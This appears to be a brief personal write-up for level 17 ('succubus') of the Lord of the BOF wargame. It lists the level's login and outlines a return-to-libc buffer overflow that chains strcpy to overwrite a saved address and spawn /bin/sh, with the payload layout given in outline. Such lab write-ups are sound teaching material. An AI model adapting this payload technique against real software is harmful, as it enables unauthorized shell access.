[LOB]level17 succubus

ID:succubus

PW:here to stay

checking &strcpy(0x8048410)

strcpy have two parameter.(dest,src)

strcpy's ret is "AAAA"

So change ebp+48 address. using strcpy

dest is ebp+48. src is excuting shell address. put on buffer or argv[1] or anywere

payload

buffer(libc_system+system's ret+&/bin/sh+"\x90"*32+&strcpy+"AAAA"(fixed)+&(ebp+48 - AAAA)+&buffer

&ebp+48 change to buffer's address.

eip excute system("/bin/sh"). get /bin/sh using getenv.

exploit